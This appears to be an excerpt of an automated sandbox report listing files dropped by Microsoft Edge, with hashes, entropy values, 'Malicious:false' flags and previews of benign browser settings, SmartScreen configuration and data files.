                                                                                                                                                                                    Entropy (8bit):5.790644179820606
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ak8BoeiRUpthQc6qRAq1k8SPxVLZ7VTiq:akJCQc6q3QxVNZTiq
                                                                                                                                                                                    MD5:E344CDFEFE09EF8F1A30F6A15B2BBDF1
                                                                                                                                                                                    SHA1:49B0A723665484DCE70126E81C073D1B301EE82A
                                                                                                                                                                                    SHA-256:929397D69A9597CF197A406975128B990D6EB65C79C56B910A896F90F684848B
                                                                                                                                                                                    SHA-512:C27FD5D2C539F30127F0291337C08EAE37EF210BDC8906FCDBAD50B54C5BB7B119BE82BF5CCD7B8817E86EF32B771E8463EAC7F69D1F27AC8882F526789D25EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC8CK533tb6QaejX7o75gqCEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADBOi7+y60hQFGCDCz0FBh1Y7fVnmacANSYaXNgsyAQbgAAAAA
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6820
                                                                                                                                                                                    Entropy (8bit):5.790644179820606
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ak8BoeiRUpthQc6qRAq1k8SPxVLZ7VTiq:akJCQc6q3QxVNZTiq
                                                                                                                                                                                    MD5:E344CDFEFE09EF8F1A30F6A15B2BBDF1
                                                                                                                                                                                    SHA1:49B0A723665484DCE70126E81C073D1B301EE82A
                                                                                                                                                                                    SHA-256:929397D69A9597CF197A406975128B990D6EB65C79C56B910A896F90F684848B
                                                                                                                                                                                    SHA-512:C27FD5D2C539F30127F0291337C08EAE37EF210BDC8906FCDBAD50B54C5BB7B119BE82BF5CCD7B8817E86EF32B771E8463EAC7F69D1F27AC8882F526789D25EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC8CK533tb6QaejX7o75gqCEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADBOi7+y60hQFGCDCz0FBh1Y7fVnmacANSYaXNgsyAQbgAAAAA
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6820
                                                                                                                                                                                    Entropy (8bit):5.790644179820606
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ak8BoeiRUpthQc6qRAq1k8SPxVLZ7VTiq:akJCQc6q3QxVNZTiq
                                                                                                                                                                                    MD5:E344CDFEFE09EF8F1A30F6A15B2BBDF1
                                                                                                                                                                                    SHA1:49B0A723665484DCE70126E81C073D1B301EE82A
                                                                                                                                                                                    SHA-256:929397D69A9597CF197A406975128B990D6EB65C79C56B910A896F90F684848B
                                                                                                                                                                                    SHA-512:C27FD5D2C539F30127F0291337C08EAE37EF210BDC8906FCDBAD50B54C5BB7B119BE82BF5CCD7B8817E86EF32B771E8463EAC7F69D1F27AC8882F526789D25EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC8CK533tb6QaejX7o75gqCEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADBOi7+y60hQFGCDCz0FBh1Y7fVnmacANSYaXNgsyAQbgAAAAA
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6820
                                                                                                                                                                                    Entropy (8bit):5.790644179820606
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ak8BoeiRUpthQc6qRAq1k8SPxVLZ7VTiq:akJCQc6q3QxVNZTiq
                                                                                                                                                                                    MD5:E344CDFEFE09EF8F1A30F6A15B2BBDF1
                                                                                                                                                                                    SHA1:49B0A723665484DCE70126E81C073D1B301EE82A
                                                                                                                                                                                    SHA-256:929397D69A9597CF197A406975128B990D6EB65C79C56B910A896F90F684848B
                                                                                                                                                                                    SHA-512:C27FD5D2C539F30127F0291337C08EAE37EF210BDC8906FCDBAD50B54C5BB7B119BE82BF5CCD7B8817E86EF32B771E8463EAC7F69D1F27AC8882F526789D25EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC8CK533tb6QaejX7o75gqCEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADBOi7+y60hQFGCDCz0FBh1Y7fVnmacANSYaXNgsyAQbgAAAAA
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                    Entropy (8bit):0.6076734404679848
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:TLyeuAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is9kDydUzcQAJmdLRlEk:TLyXOUOq0afDdWec9sJuk802D7J5fc
                                                                                                                                                                                    MD5:F8EF21D26493A9CCDCC67C57903041B0
                                                                                                                                                                                    SHA1:4698EBCEDA9BBDBCED60809F8DD4462909D80C21
                                                                                                                                                                                    SHA-256:EEB4D9CE5D926F93404E8BE393D20EDAD935D2303DDC690885CAEC2DD78D2FF7
                                                                                                                                                                                    SHA-512:B1EC66B2A2F86503FF3142F911D58B9AE925A61A52BDF3A63A18CA71112D6C5D0A040185E81B5805D2468F12547D6B8D687AAE6BBA0D236926C754DF0042B349
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.01057775872642915
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsFl:/F
                                                                                                                                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                    Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.011852361981932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.012340643231932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):262512
                                                                                                                                                                                    Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:LsNlxaj/:Ls3xa/
                                                                                                                                                                                    MD5:EED69BDF52F3A29B1DE7B5617084E50A
                                                                                                                                                                                    SHA1:E689F295D4F84D07F3B9EA43AC04C9B2B2464A48
                                                                                                                                                                                    SHA-256:B98C7875A7B725B1E71A65B541047C3FEB89FE843CB37B3A6434A059FC5E70DC
                                                                                                                                                                                    SHA-512:43E51E38658611511513F3C3F404EA1EC70EAD6D693A90B6CDFE0925D4F4F5D225C4C5ADE50ADED0BAC760469108B5972F1CE6BB5B9DAE9611658D2EBDAEF886
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:............................................./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                    Entropy (8bit):4.3818353308528755
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                    MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                    SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                    SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                    SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                    Entropy (8bit):4.014438730983427
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                    MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                    SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                    SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                    SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                    Entropy (8bit):3.922828737239167
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                    MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                    SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                                    SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                    SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:customSynchronousLookupUris_0
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):35302
                                                                                                                                                                                    Entropy (8bit):7.99333285466604
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                    MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                    SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                    SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                    SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):18
                                                                                                                                                                                    Entropy (8bit):3.5724312513221195
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                                                                                                    MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                                                                                                    SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                                                                                                    SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                                                                                                    SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:edgeSettings_2.0-0
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3581
                                                                                                                                                                                    Entropy (8bit):4.459693941095613
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                    MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                    SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                    SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                    SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                    Entropy (8bit):4.493433469104717
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                                                                                                    MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                                                                                                    SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                                                                                                    SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                                                                                                    SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:synchronousLookupUris_636976985063396749.rel.v2
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):35302
                                                                                                                                                                                    Entropy (8bit):7.99333285466604
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                    MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                    SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                    SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                    SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):50
                                                                                                                                                                                    Entropy (8bit):3.9904355005135823
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                                                                    MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                                                                    SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                                                                    SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                                                                    SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:topTraffic_170540185939602997400506234197983529371
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):575056
                                                                                                                                                                                    Entropy (8bit):7.999649474060713
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                    MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                    SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                    SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                    SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
